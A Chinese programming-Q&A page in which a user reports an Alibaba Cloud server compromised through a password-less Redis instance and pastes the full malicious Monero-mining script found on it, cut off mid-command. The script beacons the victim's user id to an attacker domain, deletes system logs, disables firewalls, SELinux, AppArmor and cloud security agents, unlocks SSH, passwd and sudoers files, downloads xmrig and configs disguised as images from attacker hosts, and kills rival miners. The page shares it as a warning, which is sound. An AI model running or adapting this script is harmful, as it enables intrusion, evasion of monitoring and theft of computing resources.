日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本

發布時間:2024/3/7 编程问答 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

為學習使用Redis,在阿里云Linux服務器上安裝了redis并且后臺運行,開放了默認端口,而且沒有設置訪問密碼,當天晚上被執行了惡意腳本。

惡意代碼如下,分享一下:

#!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[crypto].log" ] thenecho "process possible running"current=$(date +%s)last_modified=$(stat -c "%Y" $MOHOME/[crypto].log)if [ $(($current-$last_modified)) -gt 600 ]; thenecho "no miner process running";elseecho "miner process running"exit 1fi else echo "miner process not running" fi rm -rf /var/log/syslog chattr -iua /tmp/ chattr -iua /var/tmp/ ufw disable iptables -F sudo sysctl kernel.nmi_watchdog=0 sysctl kernel.nmi_watchdog=0 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf chattr -iae /root/.ssh/ chattr -iae /root/.ssh/authorized_keys rm -rf /tmp/addres* rm -rf /tmp/walle* rm -rf /tmp/keys if ps aux | grep -i '[a]liyun'; thencurl http://update.aegis.aliyun.com/download/uninstall.sh | bashcurl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctl disable aliyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh fi if [ -f /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh ]; then/usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh stop && /usr/local/cloudmonitor/wrapper/bin/cloudmonitor.sh remove && rm -rf /usr/local/cloudmonitor elseexport ARCH=amd64if [ -f /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} ]; then/usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} uninstall && rm -rf /usr/local/cloudmonitor elseecho "ali cloud monitor not running"fi fi setenforce 0 echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegisMOxmrigMOD=http://210.35.193.88/static/unity/Build/modcore.jpg MOxmrigSTOCK=http://210.35.193.88/static/unity/Build/modcore.jpg miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.musk VERSION=2.9function FixTheSystem(){ echo "begin FixTheSystem" tntrecht -i /bin/chmod || chattr -i /bin/chmod setfacl -m u::x /bin/chmod tntrecht -i /bin/chattr || chattr -i /bin/chattr chmod +x /bin/chattr || setfacl -m u::x /bin/chattrSYSFILEARRAY=(/usr/bin/apt /usr/bin/apt-get /bin/yum /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit) for SYSFILEBIN in ${SYSFILEARRAY[@]}; do tntrecht -i $SYSFILEBIN chattr -i $SYSFILEBIN setfacl -m u::x /bin/chmod setfacl -m u::x $SYSFILEBIN chmod +x $SYSFILEBIN chattr +i $SYSFILEBIN tntrecht +i $SYSFILEBIN doneSYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config") for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do tntrecht -iR $SYSTEMFILE 2>/dev/null 1>/dev/null chattr -iR $SYSTEMFILE 2>/dev/null 1>/dev/null donesetfacl -m u::x /bin/chmod}kill_miner_proc() { netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f ./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.conf pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii pkill -f svcworkmanager pkill -f xr pkill -f trace pkill -f svcupdate pkill -f networkmanager pkill -f phpupdate rm -rf /usr/bin/config.json rm -rf /usr/bin/exin rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i 